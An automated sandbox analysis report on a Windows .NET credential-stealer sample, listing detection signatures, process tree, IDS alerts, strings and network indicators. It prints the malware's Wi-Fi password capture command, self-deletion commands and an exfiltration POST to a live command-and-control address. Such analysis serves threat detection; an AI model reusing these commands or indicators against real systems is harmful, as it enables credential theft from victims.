Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3K5MXGVOJE.exe

Overview

General Information

Sample name:3K5MXGVOJE.exe
Analysis ID:1568316
MD5:532e953689741622b91a29f7db4bcce0
SHA1:fbeb0bc18838b33caecfa429fec80431fc69c469
SHA256:dd503955140cfd86c1189e79bfd7b0c7b5ebc7ff7348fd9180486362614a880d
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
.NET source code references suspicious native API functions
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file contains section with special chars
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • 3K5MXGVOJE.exe (PID: 4236 cmdline: "C:\Users\user\Desktop\3K5MXGVOJE.exe" MD5: 532E953689741622B91A29F7DB4BCCE0)
    • cmd.exe (PID: 6304 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 4232 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 2596 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 2356 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • netsh.exe (PID: 6768 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 7788 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 1360 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 6132 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • taskkill.exe (PID: 6708 cmdline: TaskKill /F /IM 4236 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 4880 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 3212 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: 3K5MXGVOJE.exe PID: 4236JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

      Sigma Signatures

      Stealing of Sensitive Information

      barindex
      Sigma detected: Capture Wi-Fi password
      Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\3K5MXGVOJE.exe", ParentImage: C:\Users\user\Desktop\3K5MXGVOJE.exe, ParentProcessId: 4236, ParentProcessName: 3K5MXGVOJE.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 2596, ProcessName: cmd.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-04T14:54:04.616127+010028438561A Network Trojan was detected192.168.11.204971289.23.100.2331489TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 3K5MXGVOJE.exeAvira: detected
      Multi AV Scanner detection for submitted file
      Source: 3K5MXGVOJE.exeReversingLabs: Detection: 50%
      Machine Learning detection for sample
      Source: 3K5MXGVOJE.exeJoe Sandbox ML: detected
      Source: 3K5MXGVOJE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ntkrnlmp.pdbxC4 source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbMZ source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: Binary string: Stealer.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.ni.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.ni.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Configuration.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Security.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: rnlmp.pdb\* source: 3K5MXGVOJE.exe, 00000000.00000002.1059554645.0000000000D12000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdataataa source: 3K5MXGVOJE.exe, 00000000.00000002.1071835301.000000000773E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.IO.Compression.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: \C#\Arcana\Stealer\obj\Release\Stealer.pdb source: 3K5MXGVOJE.exe
      Source: Binary string: System.Configuration.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.ni.pdbRSDS source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: mscorlib.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.IO.Compression.pdbX$ source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdatata source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.00000000057BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: mscorlib.ni.pdbRSDS] source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49712 -> 89.23.100.233:1489
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 1489
      Source: unknownNetwork traffic detected: HTTP traffic on port 1489 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 1489 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 1489 -> 49712
      Source: global trafficTCP traffic: 192.168.11.20:49712 -> 89.23.100.233:1489
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="84b32282-3d72-4c2c-a4cc-4a340d632b96"Host: 89.23.100.233:1489Content-Length: 132449Expect: 100-continueConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 89.23.100.233 89.23.100.233
      Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
      Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
      Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
      Source: unknownDNS query: name: icanhazip.com
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: icanhazip.com
      Source: global trafficDNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
      Source: unknownHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="84b32282-3d72-4c2c-a4cc-4a340d632b96"Host: 89.23.100.233:1489Content-Length: 132449Expect: 100-continueConnection: Keep-Alive
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1489
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1489/uploadt
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.0000000070BD1000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
      Source: tmpF56F.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: tmpF56F.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: tmpF56F.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: tmpF56F.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: tmpF56F.tmp.dat.0.drString found in binary or memory: https://gemini.google.com/app?q=
      Source: tmpF570.tmp.dat.0.drString found in binary or memory: https://login.live.com/
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, tmpF570.tmp.dat.0.drString found in binary or memory: https://login.live.com//
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, tmpF570.tmp.dat.0.drString found in binary or memory: https://login.live.com/https://login.live.com/
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, tmpF570.tmp.dat.0.drString found in binary or memory: https://login.live.com/v104
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF54D.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      System Summary

      barindex
      PE file contains section with special chars
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .Nw
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .T]1
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184D18 NtMapViewOfSection,0_2_05184D18
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184750 NtAllocateVirtualMemory,0_2_05184750
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184E08 NtQueryVolumeInformationFile,0_2_05184E08
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184678 NtProtectVirtualMemory,0_2_05184678
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184ED0 NtDeviceIoControlFile,0_2_05184ED0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051841C0 NtClose,0_2_051841C0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184B70 NtCreateSection,0_2_05184B70
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184A98 NtOpenFile,0_2_05184A98
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184D11 NtMapViewOfSection,0_2_05184D11
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184748 NtAllocateVirtualMemory,0_2_05184748
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184E00 NtQueryVolumeInformationFile,0_2_05184E00
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184670 NtProtectVirtualMemory,0_2_05184670
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184EC8 NtDeviceIoControlFile,0_2_05184EC8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051841B8 NtClose,0_2_051841B8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184B69 NtCreateSection,0_2_05184B69
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184A91 NtOpenFile,0_2_05184A91
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184ED0: NtDeviceIoControlFile,0_2_05184ED0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4DA380_2_02B4DA38
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B410980_2_02B41098
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4C1800_2_02B4C180
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B499700_2_02B49970
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4BEA80_2_02B4BEA8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B48F380_2_02B48F38
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B48DE00_2_02B48DE0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B49BBB0_2_02B49BBB
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4BB680_2_02B4BB68
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4A1C10_2_02B4A1C1
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4996E0_2_02B4996E
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4A1680_2_02B4A168
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4BE980_2_02B4BE98
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B496080_2_02B49608
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B49F280_2_02B49F28
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B48F280_2_02B48F28
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B4DA380_2_02B4DA38
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B48DB00_2_02B48DB0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_02B495F80_2_02B495F8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518E5680_2_0518E568
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05180DD00_2_05180DD0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518DDF80_2_0518DDF8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051824A80_2_051824A8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051836F70_2_051836F7
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518C9080_2_0518C908
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518C0380_2_0518C038
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518B0600_2_0518B060
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05183AEF0_2_05183AEF
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518E5210_2_0518E521
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05180DC00_2_05180DC0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518DDE80_2_0518DDE8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184F990_2_05184F99
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05182F880_2_05182F88
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05184FA80_2_05184FA8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518DDF80_2_0518DDF8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051820180_2_05182018
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051818300_2_05181830
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_0518B0500_2_0518B050
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051868780_2_05186878
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051868880_2_05186888
